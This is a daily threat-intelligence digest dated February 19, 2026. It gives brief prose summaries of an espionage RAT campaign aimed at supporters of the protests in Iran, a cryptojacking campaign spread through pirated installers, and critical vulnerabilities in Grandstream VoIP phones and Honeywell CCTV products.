Cyware Daily Threat Intelligence, February 19, 2026

The CRESCENTHARVEST campaign weaponizes geopolitical tension by disguising data-stealing malware as urgent media files related to the ongoing protests in Iran. This operation demonstrates a calculated use of social engineering, turning a search for human rights information into a direct conduit for state-aligned espionage.

A new breed of cryptojacking is bypassing the browser to strike at the heart of the operating system by hiding within pirated software installers. By embedding itself so deeply in the system, the miner achieves significantly higher performance while remaining largely invisible to traditional security tools.

A wide-open digital door has been discovered in several Honeywell CCTV products, where a critical "no-authentication" flaw allows remote account hijacking. This 9.8-rated vulnerability exists because a sensitive API endpoint was left exposed, permitting anyone on the network to change a device’s recovery email address without a password.

Top Malware Reported in the Last 24 Hours

CrescentHarvest malware campaign drops RAT

Cybersecurity researchers have uncovered a campaign named CRESCENTHARVEST, which appears to target supporters of the ongoing protests in Iran. This operation utilizes RAT to facilitate information theft and long-term espionage. The attackers exploit recent geopolitical events to lure victims into opening malicious files disguised as protest-related images or videos. These files are bundled with authentic media and a Farsi-language report, enhancing their credibility. The attack begins with a malicious RAR archive that contains deceptive Windows shortcut files, which, when executed, deploy PowerShell code to retrieve additional malware. This malware extracts sensitive data, including browser credentials and system information, while communicating with a C2 server.

New cryptojacking campaign spotted

A newly discovered cryptojacking campaign exploits pirated software installers to facilitate a multi-stage infection aimed at maximizing Monero mining. This operation employs a customized XMRig miner and a controller component that ensures persistent access to infected systems. Unlike previous browser-based schemes, this campaign utilizes system-level malware, disguising itself as legitimate office productivity software to lure unsuspecting users. Once activated, the malware installs a primary controller named Explorer.exe, which orchestrates various functions based on command-line inputs, allowing it to install or remove components as needed. Notably, the campaign leverages a vulnerable signed driver, WinRing0x64.sys, to gain kernel-level access, enhancing mining performance significantly. 

Top Vulnerabilities Reported in the Last 24 Hours

Grandstream GXP1600 phones vulnerable to attacks

Cybersecurity researchers have identified a critical vulnerability in the Grandstream GXP1600 series of VoIP phones, tracked as CVE-2026-2329, which has a high CVSS score of 9.3. This flaw involves an unauthenticated stack-based buffer overflow that allows remote code execution with root privileges. The vulnerability is rooted in the device's web-based API service, accessible without authentication in default configurations. By exploiting this flaw, an attacker can send a malicious request that overflows a 64-byte buffer, enabling them to corrupt memory and execute arbitrary code on the device. This could lead to serious consequences, such as intercepting VoIP calls by redirecting the device to a malicious SIP proxy. A firmware update has been issued to address this critical issue, affecting various models within the GXP1600 series.

Critical flaw in Honeywell CCTV products

A critical vulnerability, tracked as CVE-2026-1670, has been identified in multiple Honeywell CCTV products, allowing unauthorized access to camera feeds and potential account hijacking. Discovered by researcher Souvik Kanda, this flaw is classified as "missing authentication for critical function" and has a severity score of 9.8. It enables unauthenticated attackers to change the recovery email address associated with device accounts through an exposed API endpoint, facilitating account takeover. Affected models include several Honeywell CCTV cameras used in small to medium business environments and critical infrastructure settings. Although there have been no reported public exploitation of this vulnerability as of February 17, CISA has issued a warning to raise awareness.